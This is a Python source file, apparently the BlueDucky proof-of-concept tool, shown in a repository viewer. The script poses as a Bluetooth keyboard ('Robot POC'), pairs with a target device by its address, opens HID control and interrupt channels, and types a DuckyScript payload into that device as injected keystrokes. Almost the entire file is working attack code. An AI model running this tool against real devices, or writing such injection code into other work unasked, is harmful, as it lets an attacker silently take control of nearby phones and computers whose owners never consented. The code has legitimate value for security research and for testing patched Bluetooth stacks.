BlueDucky-2/BlueDucky.py

441 lines
14 KiB
Python
Raw Normal View History

2024-01-17 01:21:00 +00:00
import binascii
2024-01-16 06:52:55 +00:00
import bluetooth
import logging as log
2024-01-17 01:21:00 +00:00
import sys
2024-01-16 06:52:55 +00:00
import time
2024-01-17 01:21:00 +00:00
from multiprocessing import Process
2024-01-16 06:52:55 +00:00
from pydbus import SystemBus
2024-01-17 01:21:00 +00:00
from enum import Enum
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
from utils.menu_functions import (main_menu, read_duckyscript,
run, restart_bluetooth_daemon, get_target_address)
from utils.register_device import register_hid_profile, agent_loop
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
# Background processes started by this script. setup_bluetooth() appends to
# this list and terminate_child_processes() walks it to stop them on exit.
child_processes = []
2024-01-16 06:52:55 +00:00
class ConnectionFailureException(Exception):
    """Raised when an adapter, pairing, or L2CAP connection step fails."""
class Adapter:
    """Local Bluetooth adapter driven through BlueZ on D-Bus and ``hciconfig``."""

    def __init__(self, iface):
        """Connect to the system bus and look up the adapter named ``iface``."""
        self.iface = iface
        self.bus = SystemBus()
        self.adapter = self._get_adapter(iface)

    def _get_adapter(self, iface):
        """Return the ``org.bluez`` bus object for ``iface``.

        Raises:
            ConnectionFailureException: the bus lookup raised ``KeyError``.
        """
        object_path = f"/org/bluez/{iface}"
        try:
            proxy = self.bus.get("org.bluez", object_path)
        except KeyError:
            log.error(f"Unable to find adapter '{iface}', aborting.")
            raise ConnectionFailureException("Adapter not found")
        return proxy

    def _run_command(self, command):
        """Run ``command`` (an argv list) and raise if its return code is non-zero."""
        outcome = run(command)
        if outcome.returncode == 0:
            return
        raise ConnectionFailureException(f"Failed to execute command: {' '.join(command)}. Error: {outcome.stderr}")

    def set_property(self, prop, value):
        """Set an ``hciconfig`` property, then read it back to confirm.

        The check passes when the string form of ``value`` appears anywhere
        in the output of ``hciconfig <iface> <prop>``.

        Raises:
            ConnectionFailureException: the set command failed or the value
                is missing from the read-back output.
        """
        # hciconfig takes its arguments as text.
        value_str = value if isinstance(value, str) else str(value)
        self._run_command(["sudo", "hciconfig", self.iface, prop, value_str])

        readback = run(["hciconfig", self.iface, prop])
        if value_str in readback.stdout:
            return
        log.error(f"Unable to set adapter {prop}, aborting. Output: {readback.stdout}")
        raise ConnectionFailureException(f"Failed to set {prop}")

    def power(self, powered):
        """Write ``powered`` to the adapter's ``Powered`` property."""
        self.adapter.Powered = powered

    def reset(self):
        """Power the adapter off and then back on."""
        for state in (False, True):
            self.power(state)

    def enable_ssp(self):
        """Run ``hciconfig <iface> sspmode 1``.

        Every failure is logged here and then re-raised to the caller.

        Raises:
            ConnectionFailureException: the command returned non-zero.
        """
        try:
            # NOTE(review): the original author marked this command as a
            # placeholder that may need replacing; confirm it is the right one.
            ssp_result = run(["sudo", "hciconfig", self.iface, "sspmode", "1"])
            if ssp_result.returncode == 0:
                return
            log.error(f"Failed to enable SSP: {ssp_result.stderr}")
            raise ConnectionFailureException("Failed to enable SSP")
        except Exception as e:
            log.error(f"Error enabling SSP: {e}")
            raise
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
class PairingAgent:
    """Context manager that runs ``agent_loop`` in a child process for one device."""

    def __init__(self, iface, target_addr):
        """Record the adapter and target, and derive the target's BlueZ object path."""
        self.iface = iface
        self.target_addr = target_addr
        # BlueZ device nodes look like dev_AA_BB_CC_DD_EE_FF.
        device_node = "dev_" + target_addr.upper().replace(":", "_")
        self.target_path = f"/org/bluez/{iface}/{device_node}"

    def __enter__(self):
        """Start the agent process, wait briefly, and return ``self``."""
        try:
            log.debug("Starting agent process...")
            self.agent = Process(target=agent_loop, args=(self.target_path,))
            self.agent.start()
            time.sleep(0.25)  # give the child a moment before continuing
            log.debug("Agent process started.")
        except Exception as e:
            log.error(f"Error starting agent process: {e}")
            raise
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        """Kill the agent process; exceptions from the ``with`` body still propagate."""
        try:
            log.debug("Terminating agent process...")
            self.agent.kill()
            time.sleep(0.25)
            log.debug("Agent process terminated.")
        except Exception as e:
            log.error(f"Error terminating agent process: {e}")
            raise
2024-01-16 06:52:55 +00:00
class L2CAPClient:
    """L2CAP socket to one port of a remote device, plus HID keyboard report helpers.

    Reports built here start with ``0xA1 0x01``, followed by a modifier byte,
    a zero byte, and the key codes.
    """

    # HID usage IDs of the eight modifier keys (Left Control .. Right GUI).
    _MODIFIER_USAGE_FIRST = 0xE0
    _MODIFIER_USAGE_LAST = 0xE7
    # Key slots used by encode_combo_input / send_combination.
    _COMBO_KEY_SLOTS = 6
    # Key slots used by encode_keyboard_input.
    # NOTE(review): one more than the combo encoder uses; confirm against the
    # report descriptor registered by register_hid_profile.
    _KEYBOARD_KEY_SLOTS = 7

    def __init__(self, addr, port):
        """Remember the remote address and port; no socket is opened yet."""
        self.addr = addr
        self.port = port
        self.connected = False
        self.sock = None

    @staticmethod
    def _modifier_bit(value):
        """Convert a modifier value into its bit in the report's modifier byte.

        The keyboard report carries modifiers as a bit field (bit 0 = Left
        Control ... bit 7 = Right GUI), not as usage IDs. Usage IDs 0xE0-0xE7
        are mapped to ``1 << (id - 0xE0)``; any other value is returned
        unchanged so an enum that already stores bit masks keeps working.
        """
        if L2CAPClient._MODIFIER_USAGE_FIRST <= value <= L2CAPClient._MODIFIER_USAGE_LAST:
            return 1 << (value - L2CAPClient._MODIFIER_USAGE_FIRST)
        return value

    @staticmethod
    def encode_combo_input(*args):
        """Build a report from any mix of ``Modifier_Codes`` and ``Key_Codes``.

        Arguments of any other type are ignored. At most six key codes are
        kept and unused slots are zero-filled. With no arguments the result
        is the all-zero "release" report.

        Declared static because callers invoke it through ``self``; the
        original signature took no ``self`` and relied on the instance being
        filtered out as a non-key argument.
        """
        modifiers = 0
        keycodes = []
        for arg in args:
            if isinstance(arg, Modifier_Codes):
                modifiers |= L2CAPClient._modifier_bit(arg.value)
            elif isinstance(arg, Key_Codes):
                keycodes.append(arg.value)
        keycodes = keycodes[:L2CAPClient._COMBO_KEY_SLOTS]
        keycodes += [0] * (L2CAPClient._COMBO_KEY_SLOTS - len(keycodes))
        return bytes([0xA1, 0x01, modifiers, 0x00] + keycodes)

    @staticmethod
    def encode_keyboard_input(*args):
        """Build a report with seven key slots from ``Key_Codes``/``Modifier_Codes``.

        Arguments of any other type are ignored. Passing more than seven key
        codes trips the assertion.
        """
        keycodes = []
        flags = 0
        for arg in args:
            if isinstance(arg, Key_Codes):
                keycodes.append(arg.value)
            elif isinstance(arg, Modifier_Codes):
                flags |= L2CAPClient._modifier_bit(arg.value)
        assert len(keycodes) <= L2CAPClient._KEYBOARD_KEY_SLOTS
        keycodes += [0] * (L2CAPClient._KEYBOARD_KEY_SLOTS - len(keycodes))
        return bytes([0xA1, 0x01, flags, 0x00] + keycodes)

    def close(self):
        """Close the socket if one exists and mark the client disconnected.

        The socket is closed even when ``connected`` has already been cleared
        (for example after a failed send), so it is not leaked.
        """
        if self.sock is not None:
            try:
                self.sock.close()
            finally:
                self.sock = None
        self.connected = False

    def send(self, data):
        """Send ``data``, logging the outcome; does nothing when not connected."""
        if not self.connected:
            log.error("[TX] Not connected")
            return
        log.debug(f"[TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}")
        if self.attempt_send(data, 0.1):
            log.debug(f"[TX-{self.port}] Data sent successfully")
        else:
            log.error(f"[TX-{self.port}] ERROR! Timed out sending data")

    def attempt_send(self, data, timeout):
        """Try to send ``data`` for up to ``timeout`` seconds.

        Returns:
            True once the socket accepts the data; False on timeout or after
            an unexpected exception (which also clears ``connected``).

        Raises:
            bluetooth.btcommon.BluetoothError: for any errno other than 11.
        """
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            try:
                self.sock.send(data)
                return True
            except bluetooth.btcommon.BluetoothError as ex:
                if ex.errno != 11:  # 11 is EAGAIN on Linux: retry shortly
                    raise
                time.sleep(0.001)
            except Exception as ex:
                log.error(f"[TX-{self.port}] Exception: {ex}")
                self.connected = False
                # Stop here: retrying a broken socket would only spin and
                # repeat this log line until the deadline.
                return False
        return False

    def recv(self, timeout=0):
        """Read up to 64 bytes, waiting at most ``timeout`` seconds for data.

        Returns:
            The received bytes, or None when not connected, when no data
            arrived in time, or when the peer closed the connection (which
            also clears ``connected``).

        Raises:
            bluetooth.btcommon.BluetoothError: for any errno other than 11.
        """
        start = time.time()
        while True:
            if not self.connected or self.sock is None:
                return None
            try:
                raw = self.sock.recv(64)
            except bluetooth.btcommon.BluetoothError as ex:
                if ex.errno != 11:  # 11 is EAGAIN on Linux: no data available
                    raise
                if (time.time() - start) < timeout:
                    continue
                return None
            if len(raw) == 0:
                self.connected = False
                return None
            log.debug(f"[RX-{self.port}] Received data: {binascii.hexlify(raw).decode()}")
            return raw

    def connect(self, timeout=None):
        """Open the L2CAP connection and switch the socket to non-blocking mode.

        Returns:
            True on success.

        Raises:
            ConnectionFailureException: the connection attempt failed; the
                half-open socket is closed first.
        """
        log.debug(f"Attempting to connect to {self.addr} on port {self.port}")
        sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
        sock.settimeout(timeout)
        try:
            sock.connect((self.addr, self.port))
            sock.setblocking(0)
        except Exception as ex:
            self.connected = False
            try:
                sock.close()
            except Exception as close_error:
                log.debug(f"Ignoring error while closing failed socket: {close_error}")
            log.error("ERROR connecting on port %d: %s" % (self.port, ex))
            raise ConnectionFailureException(f"Connection failure on port {self.port}") from ex
        self.sock = sock
        self.connected = True
        log.debug("SUCCESS! connected on port %d" % self.port)
        return self.connected

    def send_keyboard_report(self, *args):
        """Encode ``args`` with encode_keyboard_input and send the report."""
        self.send(self.encode_keyboard_input(*args))

    def send_keypress(self, *args, delay=0.05):
        """Send one keyboard report, then sleep ``delay`` seconds.

        With no arguments the report is empty, which releases all keys.
        """
        if args:
            log.debug(f"Attempting to send... {args}")
        self.send(self.encode_keyboard_input(*args))
        time.sleep(delay)

    def send_combination(self, *keys, delay=0.05):
        """
        Send a combination of keys, which can include modifiers and regular keys.

        The combination is held for ``delay`` seconds and then released with
        an empty report. No more than six regular keys are sent.
        """
        self.send(self.encode_combo_input(*keys))
        time.sleep(delay)
        # Send an empty report to release the keys
        self.send(self.encode_combo_input())
2024-01-16 06:52:55 +00:00
class L2CAPConnectionManager:
    """Hold one L2CAPClient per port for a single target address."""

    def __init__(self, target_address):
        """Start with no clients for ``target_address``."""
        self.target_address = target_address
        self.clients = {}

    def create_connection(self, port):
        """Create, register, and return an unconnected client for ``port``."""
        self.clients[port] = L2CAPClient(self.target_address, port)
        return self.clients[port]

    def connect_all(self):
        """Connect every registered client, in registration order.

        Returns:
            The sum of the clients' ``connect()`` results (0 when there are
            no clients).

        Raises:
            ConnectionFailureException: re-raised, after logging, from the
                first client that fails.
        """
        try:
            connected_count = 0
            for client in self.clients.values():
                connected_count += client.connect()
            return connected_count
        except ConnectionFailureException as e:
            log.error(f"Connection failure: {e}")
            raise

    def close_all(self):
        """Close every registered client."""
        for port in self.clients:
            self.clients[port].close()
def terminate_child_processes():
    """Terminate and join every process in ``child_processes`` that is still alive."""
    for worker in child_processes:
        if not worker.is_alive():
            continue
        worker.terminate()
        worker.join()
2024-01-17 01:21:00 +00:00
def setup_bluetooth(target_address, iface='hci0'):
    """Prepare the local adapter before connecting to the target.

    Restarts the Bluetooth daemon, starts ``register_hid_profile`` in a child
    process (tracked in ``child_processes``), then names, classifies, and
    powers on the adapter.

    Args:
        target_address: Address of the target device, passed through to
            ``register_hid_profile``.
        iface: Adapter name to configure; defaults to ``hci0``.

    Returns:
        The configured ``Adapter``.

    Raises:
        ConnectionFailureException: the adapter was not found or a property
            could not be set.
    """
    restart_bluetooth_daemon()
    profile_proc = Process(target=register_hid_profile, args=(iface, target_address))
    profile_proc.start()
    child_processes.append(profile_proc)

    adapter = Adapter(iface)
    adapter.set_property("name", "Robot POC")
    # Pass the class as hex text. The int 0x002540 would be stringified as the
    # decimal "9536", which hciconfig parses as hexadecimal (0x009536); the
    # read-back substring check would then pass on the wrong class.
    adapter.set_property("class", "0x002540")
    adapter.power(True)
    return adapter
# Key codes for modifier keys
class Modifier_Codes(Enum):
    """Modifier keys valued 0xE0-0xE7, with short aliases for the left-hand keys."""

    LEFTCONTROL = 0xE0
    LEFTSHIFT = 0xE1
    LEFTALT = 0xE2
    LEFTGUI = 0xE3
    RIGHTCONTROL = 0xE4
    RIGHTSHIFT = 0xE5
    RIGHTALT = 0xE6
    RIGHTGUI = 0xE7

    # Convenience names. Each repeats an existing value, so Enum treats it as
    # an alias of the left-hand member rather than as a new member.
    CTRL = LEFTCONTROL
    ALT = LEFTALT
    SHIFT = LEFTSHIFT
    GUI = LEFTGUI
# Modifier Key Set for easy checking.
# Iterating an Enum skips aliases, so this holds exactly the eight
# LEFT*/RIGHT* members.
MODIFIER_KEYS_SET = set(Modifier_Codes)
class Key_Codes(Enum):
    """Key codes for non-modifier keys, as placed in the key slots of a report.

    Digit members carry a leading underscore (``_1`` ... ``_0``) because a
    Python identifier cannot start with a digit.
    """

    NONE = 0x00

    # Letters
    A = 0x04
    B = 0x05
    C = 0x06
    D = 0x07
    E = 0x08
    F = 0x09
    G = 0x0A
    H = 0x0B
    I = 0x0C
    J = 0x0D
    K = 0x0E
    L = 0x0F
    M = 0x10
    N = 0x11
    O = 0x12
    P = 0x13
    Q = 0x14
    R = 0x15
    S = 0x16
    T = 0x17
    U = 0x18
    V = 0x19
    W = 0x1A
    X = 0x1B
    Y = 0x1C
    Z = 0x1D

    # Digits
    _1 = 0x1E
    _2 = 0x1F
    _3 = 0x20
    _4 = 0x21
    _5 = 0x22
    _6 = 0x23
    _7 = 0x24
    _8 = 0x25
    _9 = 0x26
    _0 = 0x27

    # Control and whitespace keys
    ENTER = 0x28
    ESCAPE = 0x29
    BACKSPACE = 0x2A
    TAB = 0x2B
    SPACE = 0x2C

    # Punctuation (0x32 is intentionally left as in the original: undefined)
    MINUS = 0x2D
    EQUAL = 0x2E
    LEFTBRACE = 0x2F
    RIGHTBRACE = 0x30
    BACKSLASH = 0x31
    SEMICOLON = 0x33
    QUOTE = 0x34
    BACKTICK = 0x35
    COMMA = 0x36
    DOT = 0x37
    SLASH = 0x38

    CAPSLOCK = 0x39
def process_duckyscript(client, duckyscript):
    """Replay a DuckyScript payload through ``client``.

    Supported lines:
      * ``REM ...`` and blank lines are skipped.
      * ``STRING <text>`` types ``text`` one character at a time. Letters,
        digits, space, and unshifted punctuation that ``Key_Codes`` defines
        are supported. No shift modifier is sent, so uppercase letters are
        typed as their lowercase key.
      * ``GUI <key> ...`` sends GUI together with each listed key in turn.

    Any other line is logged as unsupported and skipped.

    Args:
        client: Object providing ``send_keypress`` and ``send_combination``.
        duckyscript: Iterable of script lines.
    """
    # Characters whose Key_Codes member is named with a word.
    punctuation_names = {
        " ": "SPACE",
        "-": "MINUS",
        "=": "EQUAL",
        "[": "LEFTBRACE",
        "]": "RIGHTBRACE",
        "\\": "BACKSLASH",
        ";": "SEMICOLON",
        "'": "QUOTE",
        "`": "BACKTICK",
        ",": "COMMA",
        ".": "DOT",
        "/": "SLASH",
    }
    digits = frozenset("0123456789")

    def lookup_key(token):
        """Return the Key_Codes member for a character or key name, or None."""
        if token in punctuation_names:
            name = punctuation_names[token]
        elif token in digits:
            # Digit members are spelled _0 ... _9.
            name = "_" + token
        else:
            name = token.upper()
        return Key_Codes.__members__.get(name)

    client.send_keypress()  # Send empty report
    time.sleep(0.5)

    for line in duckyscript:
        line = line.strip()
        if not line or line.startswith("REM"):
            continue  # Skip empty lines and comments

        if line.startswith("STRING"):
            # Skip the keyword and the single separator after it.
            for letter in line[7:]:
                key_code = lookup_key(letter)
                if key_code is None:
                    log.warning(f"Unsupported character '{letter}' in Duckyscript")
                    continue
                client.send_keypress(key_code)
                client.send_keypress()  # release
                time.sleep(0.05)  # Add a small delay between keypresses
        elif line.startswith("GUI"):
            # Handle combination keys
            components = line.split()
            try:
                # Anything other than exactly "GUI" (e.g. "GUIDE") raises here.
                modifier = getattr(Modifier_Codes, components[0].upper())
                for key in components[1:]:
                    key_code = lookup_key(key)
                    if key_code is None:
                        log.warning(f"Unsupported key '{key}' in line: {line}")
                        continue
                    client.send_combination(modifier, key_code)
                client.send_combination()  # Release keys
            except AttributeError:
                log.warning(f"Unsupported key or modifier in line: {line}")
        else:
            log.warning(f"Unsupported Duckyscript command, skipping line: {line}")
def initialize_pairing(agent_iface, target_address):
    """Start a PairingAgent for the target and log that it came up.

    NOTE(review): the ``with`` body only logs, so the agent's ``__exit__``
    runs before this function returns; confirm the agent is not meant to stay
    alive while the L2CAP connections are made.

    Raises:
        ConnectionFailureException: any exception from starting or stopping
            the agent is logged and replaced with this one.
    """
    try:
        pairing = PairingAgent(agent_iface, target_address)
        with pairing:
            log.debug("Pairing agent initialized")
    except Exception as e:
        log.error(f"Failed to initialize pairing agent: {e}")
        raise ConnectionFailureException("Pairing agent initialization failed")
def establish_connections(connection_manager):
    """Connect every client of ``connection_manager``.

    Raises:
        ConnectionFailureException: ``connect_all()`` returned a falsy value.
    """
    connected = connection_manager.connect_all()
    if connected:
        return
    raise ConnectionFailureException("Failed to connect to all required ports")
2024-01-16 06:52:55 +00:00
# Main function
def main():
    """Run the tool: pick a target, load the payload, connect, and replay it.

    Returns early (after logging) when no target address or payload is
    available. Any ConnectionFailureException, including one raised while
    configuring the adapter, stops the child processes and exits with an
    error message. The L2CAP sockets are closed on every path out.
    """
    log.basicConfig(level=log.DEBUG)
    main_menu()

    target_address = get_target_address()
    if not target_address:
        log.info("No target address provided. Exiting.")
        return

    duckyscript = read_duckyscript()
    if not duckyscript:
        log.info("Payload file not found. Exiting.")
        return

    connection_manager = L2CAPConnectionManager(target_address)
    try:
        # Adapter setup can raise ConnectionFailureException too, so it sits
        # inside the try and gets the same clean exit as a failed connection.
        adapter = setup_bluetooth(target_address)
        adapter.enable_ssp()

        connection_manager.create_connection(1)   # SDP
        connection_manager.create_connection(17)  # HID Control
        connection_manager.create_connection(19)  # HID Interrupt

        initialize_pairing('hci0', target_address)
        establish_connections(connection_manager)

        hid_interrupt_client = connection_manager.clients[19]
        process_duckyscript(hid_interrupt_client, duckyscript)
    except ConnectionFailureException as e:
        log.error(f"Connection failure: {e}")
        terminate_child_processes()
        sys.exit("Exiting script due to connection failure")
    finally:
        # Release any sockets that were opened, on success and on failure.
        connection_manager.close_all()
if __name__ == "__main__":
    # Script entry point: run main() and stop the background processes
    # afterwards, even when main() raises or calls sys.exit().
    try:
        main()
    finally:
        terminate_child_processes()